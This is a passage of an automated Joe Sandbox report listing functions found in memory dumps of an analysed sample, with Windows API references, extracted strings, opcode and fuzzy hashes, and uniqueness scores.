                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad894f043658c9da9d040c04e807821c8937e8b2a7a016f0074f8c1e452d61c3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC41B174A14342DFDB45EF29D8606BAB3E5AFA8305F52181EF989C7280E730DD54CB52
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0034D0F7
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0034D0FF
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0034D188
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 0034D1B3
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 0034D208
                                                                                                                                                                                                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0034D21E
                                                                                                                                                                                                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 0034D233
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1385549066-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: d41f7d3b82ffc835c42a08696e990f39cf0c4070fe53d16cb695218a4771ac00
                                                                                                                                                                                                                                                                          • Instruction ID: ffc965cdeb12886fc6bc1360fa47c06800042ab1265ee8e1b812550c66bf0c0d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d41f7d3b82ffc835c42a08696e990f39cf0c4070fe53d16cb695218a4771ac00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A41BF34A00218ABCF12DF68C885A9EBBE5BF49314F158495EC15AF392D775FA05CFA0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsWindowVisible.USER32(?,00000000,?,75A88510,00000000), ref: 6A569D66
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000000B,00000000,00000000,?,00000000,?,75A88510,00000000), ref: 6A569D82
                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0,?,00000000,?,75A88510,00000000), ref: 6A569D88
                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?,?,000000F0,?,00000000,?,75A88510,00000000), ref: 6A569DFA
                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?,?,?,?,000000F0,?,00000000,?,75A88510,00000000), ref: 6A569E12
                                                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,00000002,00000002,?,?,?,000000F0,?,00000000,?,75A88510,00000000), ref: 6A569E23
                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000014,00000000,?,00000002,00000002,?,00000014,?,00000002,00000002,?,?,?,000000F0,?,00000000), ref: 6A569E9F
                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6A569ED3
                                                                                                                                                                                                                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 6A569EE0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Window$MessageSend$ItemLongPointsRectRedrawVisible
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3196996609-0
                                                                                                                                                                                                                                                                          • Opcode ID: 25f46c8e4d326b177e1a729dcd260cc8c4f8df17aaba4d5782398389f031ead9
                                                                                                                                                                                                                                                                          • Instruction ID: d9fd69b1d56c91ef8780491122cad04ce147d94b85252a00975e829eba22d5ac
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25f46c8e4d326b177e1a729dcd260cc8c4f8df17aaba4d5782398389f031ead9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6512570204301DFEB20CF29C985B2ABBE1BF89744F114A1EF5969B2A5DB31EC54CB56
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: EnterCriticalSection.KERNEL32(6A5D6A2C,?,?,6A547F2E,6A5D7224,6A59F850), ref: 6A56CF1B
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: LeaveCriticalSection.KERNEL32(6A5D6A2C,?,6A547F2E,6A5D7224,6A59F850), ref: 6A56CF4E
                                                                                                                                                                                                                                                                            • Part of subcall function 6A56CF11: RtlWakeAllConditionVariable.NTDLL ref: 6A56CFC5
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,00000000), ref: 6A5692D6
                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,00000000), ref: 6A5692DD
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,0000000C,?,00000000), ref: 6A5692F1
                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,00000000), ref: 6A5692F8
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,?,00000000,00000000,00000000,6A5B6F74,00000002,?,00000000), ref: 6A569387
                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,00000000), ref: 6A56938E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • *** Stack Trace (x86) ***, xrefs: 6A568E95
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleHandle$AttributeCriticalSectionText$BufferConditionEnterInfoLeaveScreenVariableWake
                                                                                                                                                                                                                                                                          • String ID: *** Stack Trace (x86) ***
                                                                                                                                                                                                                                                                          • API String ID: 1922930761-1035257212
                                                                                                                                                                                                                                                                          • Opcode ID: 86b0fb69d831f488b99f59c30872ee4276fbef919194880bd8d91658028f31ae
                                                                                                                                                                                                                                                                          • Instruction ID: 2af2b9065780d0ed1a4829dd9bd5a2e504aae851adaa5ca99e558405743711a7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86b0fb69d831f488b99f59c30872ee4276fbef919194880bd8d91658028f31ae
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63025871A00248DFDF10DFA8C848BDEBBF4EF49328F21465AE525A7290DB756A44CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6A55F9E2
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55FA1D
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55FA40
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55FA68
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55FB07
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                                                                                                          • API String ID: 3053331623-2658103896
                                                                                                                                                                                                                                                                          • Opcode ID: ebdda03f6b3df1bd503f05d73cd173f7a7d814a53ad997c9f2e28a0170ed768b
                                                                                                                                                                                                                                                                          • Instruction ID: 2a059335552481b228261ec31fa3da18801c3229227b20b92a97d4ac9a2cb6b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebdda03f6b3df1bd503f05d73cd173f7a7d814a53ad997c9f2e28a0170ed768b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DA1A1B1D00348DFDB11DF94C944B9EBBF8FF45314F15426AE815AB282EB74AA48CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0045B200,00000000,DF534560,00000000,003AAD83,000000FF,?,DF534560), ref: 001B29D3
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,DF534560), ref: 001B29DD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                                                                                                                                                                                          • String ID: VolumeCostAvailable$VolumeCostDifference$VolumeCostRequired$VolumeCostSize$VolumeCostVolume
                                                                                                                                                                                                                                                                          • API String ID: 439134102-34576578
                                                                                                                                                                                                                                                                          • Opcode ID: 083ecc84e5f890a1089fc7601dcb03fdc1216dca186304005b2b1e26fa6558d2
                                                                                                                                                                                                                                                                          • Instruction ID: 7729ffdf0f32ecd38f158c926cee67a879a668f4046b41151f2f48a93c893ce3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 083ecc84e5f890a1089fc7601dcb03fdc1216dca186304005b2b1e26fa6558d2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A551C1B19007589BCB01DF65DC057DEBBF4FB08715F10422AE829EB291EB74AA08CB95
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000020), ref: 001E057B
                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 001E05B8
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcpyn
                                                                                                                                                                                                                                                                          • String ID: ,b4$?$h]4$t$a4
                                                                                                                                                                                                                                                                          • API String ID: 97706510-920588579
                                                                                                                                                                                                                                                                          • Opcode ID: d8f679854e08456c7f82584145ad0cdc42d5ad71328371f6e15646f124a2a00f
                                                                                                                                                                                                                                                                          • Instruction ID: 0b2af9c0073ef51980cf9f54720934c2f2845d5fd28ec2f4ad01fda2e719d6f2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8f679854e08456c7f82584145ad0cdc42d5ad71328371f6e15646f124a2a00f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65513C71508380AFE721DF60DC49B9BBBE8AB88701F00492DF299DA192D774E948CB56
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00348F39,00000000,?,?,001C5514,?), ref: 00348DB3
                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,001C5514,?), ref: 00348DBA
                                                                                                                                                                                                                                                                            • Part of subcall function 00348E85: IsProcessorFeaturePresent.KERNEL32(0000000C,00348DA1,00000000,?,00348F39,00000000,?,?,001C5514,?), ref: 00348E87
                                                                                                                                                                                                                                                                          • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00348F39,00000000,?,?,001C5514,?), ref: 00348DCA
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,001C5514,?), ref: 00348DF1
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,001C5514,?), ref: 00348E05
                                                                                                                                                                                                                                                                          • InterlockedPopEntrySList.KERNEL32(00000000,?,?,001C5514,?), ref: 00348E18
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,001C5514,?), ref: 00348E2B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2460949444-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6a4ccc25b516ec987caca63d0195d34b98c690cb0eb690c3f45652309f91243b
                                                                                                                                                                                                                                                                          • Instruction ID: 853a3bec279c6c0d47e6099861aed036462447e80dc091b90fc5443b711623e8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a4ccc25b516ec987caca63d0195d34b98c690cb0eb690c3f45652309f91243b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC11A772A02621ABD7235BA89C49F6F36DCEB45781F191830FA09EE591DF60FC4087A4
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002FA21B
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002FA2C2
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002FA2E1
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9120: FindResourceW.KERNEL32(00000000,?,00000006,-00000010,?,?,001BCB50,-00000010,?,002F55F7,00000008,DF534560), ref: 001B9143
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 002FA383
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 002FA52A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _wcschr$Init_thread_footer$CountFindHeapProcessResourceTick
                                                                                                                                                                                                                                                                          • String ID: 0123456789AaBbCcDdEeFf
                                                                                                                                                                                                                                                                          • API String ID: 2181188311-3822820098
                                                                                                                                                                                                                                                                          • Opcode ID: 94d1cf3e075794c3283a78047ed3c1408eec3ee6a86c877c21c9693821035f2e
                                                                                                                                                                                                                                                                          • Instruction ID: 562f21b4334a551accc345154bac33fef6befb51def577f733f0c99f16e306b9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94d1cf3e075794c3283a78047ed3c1408eec3ee6a86c877c21c9693821035f2e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FD102B0A10A098FDB10CF68C848BBEF7E5FF44350F14826DE65997291DB74E945CB92
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 6A547E10: GetProcessHeap.KERNEL32 ref: 6A547E6C
                                                                                                                                                                                                                                                                            • Part of subcall function 6A549220: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,6A5659A5,-00000010), ref: 6A549258
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6A560CC5
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6A560D69
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6A560D94
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 6A560EDD
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _wcschr$FindHeapProcessResource
                                                                                                                                                                                                                                                                          • String ID: 0123456789AaBbCcDdEeFf$a
                                                                                                                                                                                                                                                                          • API String ID: 3569040288-3748620546
                                                                                                                                                                                                                                                                          • Opcode ID: a7c397a69796a2bf5b6a9fed30a65cc2205ab0858022502e60ffbbaec040f58c
                                                                                                                                                                                                                                                                          • Instruction ID: a0ab401689d68ddf133fddcd5ae9b5aff88a807a9cd31f09220487a9b9c5a022
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7c397a69796a2bf5b6a9fed30a65cc2205ab0858022502e60ffbbaec040f58c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC17C71A016159FDB01CFA8C888B9EF7F5FF88314F11865AE524AB3A1DB35AD41CB50
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0045B1E0,DF534560,?,?,?,?,?,?,?,?,?,?,?,?,00000000,003753A5), ref: 001C986A
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(0000FFFF,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00000000,003753A5), ref: 001C98EA
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0045B1FC,?,?,?,?,?,?,?,?,?,?,?,00000000,003753A5,000000FF), ref: 001C9AA3
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0045B1FC,?,?,?,?,?,?,?,?,?,?,00000000,003753A5,000000FF), ref: 001C9AC4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$Enter$FileLeaveModuleName
                                                                                                                                                                                                                                                                          • String ID: v
                                                                                                                                                                                                                                                                          • API String ID: 1807155316-3261393531
                                                                                                                                                                                                                                                                          • Opcode ID: 2049b08b09a7bea33dd78dcda4467919bf5fdbef4ab3e65b30d6d75c8fb4f6f4
                                                                                                                                                                                                                                                                          • Instruction ID: 37aea371052f229c39828b02b43593933890cb6beaa83425f185f4d14007dfd0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2049b08b09a7bea33dd78dcda4467919bf5fdbef4ab3e65b30d6d75c8fb4f6f4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71B14B70A00259EFDB11CFA4D888FAEBBB4AF19305F14419DE805EB291D775EE44CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
